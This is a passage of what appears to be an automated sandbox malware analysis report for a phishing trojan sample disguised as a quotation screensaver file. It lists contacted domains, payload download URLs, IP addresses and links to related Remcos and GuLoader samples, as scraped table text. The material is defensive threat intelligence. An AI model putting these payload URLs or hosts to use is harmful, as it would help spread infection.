                http://crl.quovadisglobal.com/qvrca.crl00%VirustotalBrowse
                http://nsis.sf.net/NSIS_Error0%VirustotalBrowse
                https://www.google.com0%VirustotalBrowse
                http://geoplugin.net/json.gpn.net/json.gp0%VirustotalBrowse
                http://geoplugin.net/0%VirustotalBrowse
                http://geoplugin.net/json.gpM0%VirustotalBrowse
                https://login.yahoo.com/config/login0%VirustotalBrowse
                https://telesavers.co.za/1%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                telesavers.co.za
                		102.65.21.26
                		truefalseunknown
                geoplugin.net
                		178.237.33.50
                		truefalseunknown
                subddfg.lol
                		23.106.238.209
                		truetrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://geoplugin.net/json.gpfalseunknown
                https://telesavers.co.za/FrKSUMZ203.bintrue
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://telesavers.co.za/-4062-986e-6b0fce555694sz1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073DF000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    https://telesavers.co.za/FrKSUMZ203.bincz1Quotation.scr.exe, 00000082.00000003.33236810978.0000000007415000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33541893342.0000000007415000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://geoplugin.net/json.gpB_z1Quotation.scr.exe, 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      http://geoplugin.net/json.gpH_z1Quotation.scr.exe, 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://ocsp.quovadisglobal.com0Odxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://geoplugin.net/json.gpsgz1Quotation.scr.exe, 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://telesavers.co.za/)z1Quotation.scr.exe, 00000082.00000003.33236979197.00000000073FC000.00000004.00000020.00020000.00000000.sdmptrue
                              		unknown
                              http://geoplugin.net/json.gpo_z1Quotation.scr.exe, 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://telesavers.co.za/(z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073F7000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33236979197.00000000073FC000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33542108978.00000000073FF000.00000004.00000020.00020000.00000000.sdmptrue
                                  		unknown
                                  http://crl.quovadisglobal.com/qvicag4.crl0dxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                  https://telesavers.co.za/Ttz1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073F7000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33236979197.00000000073FC000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33542108978.00000000073FF000.00000004.00000020.00020000.00000000.sdmptrue
                                    		unknown
                                    http://www.imvu.comz1Quotation.scr.exefalseunknown
                                    https://telesavers.co.za/FrKSUMZ203.binrasadhlp.dllz1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073F7000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33236979197.00000000073FC000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33542108978.00000000073FF000.00000004.00000020.00020000.00000000.sdmptrue
                                      		unknown
                                      https://telesavers.co.za/-4062-986e-6b0fce555694z1Quotation.scr.exe, 00000082.00000003.33237027260.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073DF000.00000004.00000020.00020000.00000000.sdmptrue
                                        		unknown
                                        http://nsis.sf.net/NSIS_ErrorErrorz1Quotation.scr.exe, 00000000.00000000.32405926725.000000000040A000.00000008.00000001.01000000.00000003.sdmp, z1Quotation.scr.exe, 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmp, z1Quotation.scr.exe, 00000082.00000000.32835780083.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalseunknown
                                        https://telesavers.co.za/boz1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073DF000.00000004.00000020.00020000.00000000.sdmptrue
                                          		unknown
                                          http://trust.quovadisglobal.com/qvrca.crt0dxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                          http://pki.intel.com/crt/IntelCA7B.crt0dxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                          http://www.quovadisglobal.com/repository0dxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                          http://pki.intel.com/crl/IntelCA7B.crl0fdxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                          http://trust.quovadisglobal.com/qvicag4.crt0dxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                          http://ocsp.quovadisglobal.com05dxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://www.google.comz1Quotation.scr.exefalseunknown
                                            http://crl.quovadisglobal.com/qvrca.crl0dxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                            http://geoplugin.net/json.gpn.net/json.gpz1Quotation.scr.exe, 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                            http://nsis.sf.net/NSIS_Errorz1Quotation.scr.exe, z1Quotation.scr.exe, 00000000.00000000.32405926725.000000000040A000.00000008.00000001.01000000.00000003.sdmp, z1Quotation.scr.exe, 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmp, z1Quotation.scr.exe, 00000082.00000000.32835780083.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalseunknown
                                            http://geoplugin.net/z1Quotation.scr.exe, 00000082.00000003.34024760811.0000000007483000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                            https://telesavers.co.za/-4062-986e-6b0fce555694sDNz1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073DF000.00000004.00000020.00020000.00000000.sdmptrue
                                              		unknown
                                              https://telesavers.co.za/FrKSUMZ203.binAppDataz1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073F7000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33542108978.00000000073FF000.00000004.00000020.00020000.00000000.sdmptrue
                                                		unknown
                                                https://telesavers.co.za/FrKSUMZ203.binIz1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073F7000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33236810978.0000000007415000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33236979197.00000000073FC000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33541893342.0000000007415000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33542108978.00000000073FF000.00000004.00000020.00020000.00000000.sdmptrue
                                                  		unknown
                                                  https://telesavers.co.za/telesavers.co.za5z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073F7000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33542108978.00000000073FF000.00000004.00000020.00020000.00000000.sdmptrue
                                                    		unknown
                                                    http://geoplugin.net/json.gpMz1Quotation.scr.exe, 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                    https://telesavers.co.za/Joz1Quotation.scr.exe, 00000082.00000003.33237027260.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073DF000.00000004.00000020.00020000.00000000.sdmptrue
                                                      		unknown
                                                      http://www.quovadis.bm0z1Quotation.scr.exe, 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33996272367.0000000007435000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33995869114.0000000007435000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000084.00000003.36286467585.0000000002ACD000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000084.00000002.36290061377.0000000002ACD000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000084.00000003.36215218240.0000000002ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://www.google.com/accounts/serviceloginz1Quotation.scr.exefalse
                                                          		unknown
                                                          https://login.yahoo.com/config/loginz1Quotation.scr.exefalseunknown
                                                          https://telesavers.co.za/z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968794940.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35959037232.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35979025881.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33236979197.00000000073FC000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33542108978.00000000073FF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35989039555.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121957679.00000000073E0000.00000004.00000020.00020000.00000000.sdmptrueunknown
                                                          http://www.nirsoft.net/z1Quotation.scr.exefalse
                                                            		unknown
                                                            https://ocsp.quovadisoffshore.com0z1Quotation.scr.exe, 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33996272367.0000000007435000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33995869114.0000000007435000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000084.00000003.36286467585.0000000002ACD000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000084.00000002.36290061377.0000000002ACD000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000084.00000003.36215218240.0000000002ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://geoplugin.net/json.gpV_0z1Quotation.scr.exe, 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://telesavers.co.za/telesavers.co.zaz1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073F7000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33542108978.00000000073FF000.00000004.00000020.00020000.00000000.sdmptrue
                                                                  		unknown
                                                                  https://telesavers.co.za/Boz1Quotation.scr.exe, 00000082.00000003.33237027260.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073DF000.00000004.00000020.00020000.00000000.sdmptrue
                                                                    		unknown
                                                                    http://OCSP.intel.com/0dxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://www.ebuddy.comz1Quotation.scr.exefalse
                                                                        		unknown

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        23.106.238.209
                                                                        		subddfg.lolUnited Kingdom
                                                                        		7203LEASEWEB-USA-SFO-12UStrue
                                                                        102.65.21.26
                                                                        		telesavers.co.zaSouth Africa
                                                                        		328453Web-Africa-Networks-ASZAfalse
                                                                        178.237.33.50
                                                                        		geoplugin.netNetherlands
                                                                        		8455ATOM86-ASATOM86NLfalse

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1522580
                                                                        Start date and time:2024-09-30 12:00:14 +02:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 19m 28s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                        Run name:Suspected Instruction Hammering
                                                                        Number of analysed new started processes analysed:145
                                                                        Number of new started drivers analysed:2
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:z1Quotation.scr.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.phis.troj.spyw.evad.winEXE@410/33@14/3
                                                                        EGA Information:
                                                                        • Successful, ratio: 100%
                                                                        HCA Information:
                                                                        • Successful, ratio: 98%
                                                                        • Number of executed functions: 177
                                                                        • Number of non-executed functions: 308
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WmiPrvSE.exe, svchost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 52.168.117.173
                                                                        • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, clients.config.office.net
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        06:05:37API Interceptor9096242x Sleep call for process: z1Quotation.scr.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        102.65.21.26X8VbtniLpf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                          rSignedApprovedQuotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            178.237.33.50V1ljXRn7Yo.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            Invoice and packing list (021)_pdf.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • geoplugin.net/json.gp
                                                                            ZIXBhdgf6y.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            yVhGfho0R4.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            oi2BC6zhUY.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • geoplugin.net/json.gp

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            telesavers.co.zaX8VbtniLpf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 102.65.21.26
                                                                            geoplugin.netV1ljXRn7Yo.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            Invoice and packing list (021)_pdf.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 178.237.33.50
                                                                            ZIXBhdgf6y.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            yVhGfho0R4.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            oi2BC6zhUY.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 178.237.33.50

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            LEASEWEB-USA-SFO-12UShttp://umjkitjtsk.top/crp/325gewfkj345Get hashmaliciousUnknownBrowse
                                                                            • 209.58.134.240
                                                                            BAT6357377.exeGet hashmaliciousFormBookBrowse
                                                                            • 147.255.16.249
                                                                            SecuriteInfo.com.Linux.Siggen.9999.19003.7982.elfGet hashmaliciousMiraiBrowse
                                                                            • 23.82.95.146
                                                                            mipsGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                            • 23.83.167.235
                                                                            Quotation.exeGet hashmaliciousFormBookBrowse
                                                                            • 147.255.16.249
                                                                            https://fwealthm.comGet hashmaliciousUnknownBrowse
                                                                            • 23.82.31.224
                                                                            94.156.8.9-skid.ppc-2024-07-23T17_40_07.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 23.82.95.149
                                                                            yIRn1ZmsQF.elfGet hashmaliciousUnknownBrowse
                                                                            • 23.83.167.231
                                                                            Absa Eft.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                            • 23.106.53.146
                                                                            http://lovelycarrot.comGet hashmaliciousUnknownBrowse
                                                                            • 209.58.133.18
                                                                            Web-Africa-Networks-ASZAX8VbtniLpf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 102.65.21.26
                                                                            m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 102.65.164.138
                                                                            x86.elfGet hashmaliciousUnknownBrowse
                                                                            • 102.65.186.72
                                                                            Uw0VH7yLVB.elfGet hashmaliciousMiraiBrowse
                                                                            • 102.65.222.253
                                                                            rSignedApprovedQuotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • 102.65.21.26
                                                                            http://packages.mpinsureit.com/Get hashmaliciousUnknownBrowse
                                                                            • 102.65.21.13
                                                                            jew.arm.elfGet hashmaliciousUnknownBrowse
                                                                            • 102.65.73.255
                                                                            https://www.packages.mpinsureit.com/Get hashmaliciousUnknownBrowse
                                                                            • 102.65.21.13
                                                                            N2lCCQIbyW.elfGet hashmaliciousMiraiBrowse
                                                                            • 102.65.252.110
                                                                            4xGw66BS5c.elfGet hashmaliciousMiraiBrowse
                                                                            • 102.65.0.111
                                                                            ATOM86-ASATOM86NLV1ljXRn7Yo.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            Invoice and packing list (021)_pdf.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 178.237.33.50
                                                                            ZIXBhdgf6y.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            yVhGfho0R4.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            oi2BC6zhUY.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 178.237.33.50

                                                                            JA3 Fingerprints

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            37f463bf4616ecd445d4a1937da06e191727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 102.65.21.26
                                                                            Gelato Italiano_74695.exe.exeGet hashmaliciousUnknownBrowse
                                                                            • 102.65.21.26
                                                                            Gelato Italiano_74695.exe.exeGet hashmaliciousUnknownBrowse
                                                                            • 102.65.21.26
                                                                            Bnnebgers.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                                            • 102.65.21.26
                                                                            NTS_eTaxInvoice.html.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 102.65.21.26
